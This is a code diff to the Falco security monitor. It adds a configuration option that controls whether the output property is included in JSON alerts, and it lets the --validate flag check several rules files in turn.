end

View File

@@ -67,6 +67,7 @@ void falco_configuration::init(string conf_filename, list<string> &cmdline_optio
}
m_json_output = m_config->get_scalar<bool>("json_output", false);
m_json_include_output_property = m_config->get_scalar<bool>("json_include_output_property", true);
falco_outputs::output_config file_output;
file_output.name = "file";

View File

@@ -167,6 +167,7 @@ class falco_configuration
std::list<std::string> m_rules_filenames;
bool m_json_output;
bool m_json_include_output_property;
std::vector<falco_outputs::output_config> m_outputs;
uint32_t m_notifications_rate;
uint32_t m_notifications_max_burst;

View File

@@ -111,7 +111,8 @@ static void usage()
" single line emitted by falco to be flushed, which generates higher CPU\n"
" usage but is useful when piping those outputs into another process\n"
" or into a script.\n"
" -V,--validate <rules_file> Read the contents of the specified rules file and exit\n"
" -V,--validate <rules_file> Read the contents of the specified rules(s) file and exit\n"
" Can be specified multiple times to validate multiple files.\n"
" -v Verbose output.\n"
" --version Print version number.\n"
"\n"
@@ -245,7 +246,7 @@ int falco_init(int argc, char **argv)
string pidfilename = "/var/run/falco.pid";
bool describe_all_rules = false;
string describe_rule = "";
string validate_rules_file = "";
list<string> validate_rules_filenames;
string stats_filename = "";
bool verbose = false;
bool all_events = false;
@@ -282,7 +283,7 @@ int falco_init(int argc, char **argv)
{"pidfile", required_argument, 0, 'P' },
{"unbuffered", no_argument, 0, 'U' },
{"version", no_argument, 0, 0 },
{"validate", required_argument, 0, 0 },
{"validate", required_argument, 0, 'V' },
{"writefile", required_argument, 0, 'w' },
{0, 0, 0, 0}
@@ -396,7 +397,7 @@ int falco_init(int argc, char **argv)
verbose = true;
break;
case 'V':
validate_rules_file = optarg;
validate_rules_filenames.push_back(optarg);
break;
case 'w':
outfile = optarg;
@@ -460,10 +461,17 @@ int falco_init(int argc, char **argv)
}
}
if(validate_rules_file != "")
if(validate_rules_filenames.size() > 0)
{
falco_logger::log(LOG_INFO, "Validating rules file: " + validate_rules_file + "...\n");
engine->load_rules_file(validate_rules_file, verbose, all_events);
falco_logger::log(LOG_INFO, "Validating rules file(s):\n");
for(auto file : validate_rules_filenames)
{
falco_logger::log(LOG_INFO, " " + file + "\n");
}
for(auto file : validate_rules_filenames)
{
engine->load_rules_file(file, verbose, all_events);
}
falco_logger::log(LOG_INFO, "Ok\n");
goto exit;
}
@@ -539,6 +547,7 @@ int falco_init(int argc, char **argv)
}
outputs->init(config.m_json_output,
config.m_json_include_output_property,
config.m_notifications_rate, config.m_notifications_max_burst,
config.m_buffered_outputs);

View File

@@ -52,7 +52,9 @@ falco_outputs::~falco_outputs()
}
}
void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered)
void falco_outputs::init(bool json_output,
bool json_include_output_property,
uint32_t rate, uint32_t max_burst, bool buffered)
{
// The engine must have been given an inspector by now.
if(! m_inspector)
@@ -65,7 +67,7 @@ void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bo
// Note that falco_formats is added to both the lua state used
// by the falco engine as well as the separate lua state used
// by falco outputs.
falco_formats::init(m_inspector, m_ls, json_output);
falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property);
falco_logger::init(m_ls);

View File

@@ -41,7 +41,9 @@ public:
std::map<std::string, std::string> options;
};
void init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered);
void init(bool json_output,
bool json_include_output_property,
uint32_t rate, uint32_t max_burst, bool buffered);
void add_output(output_config oc);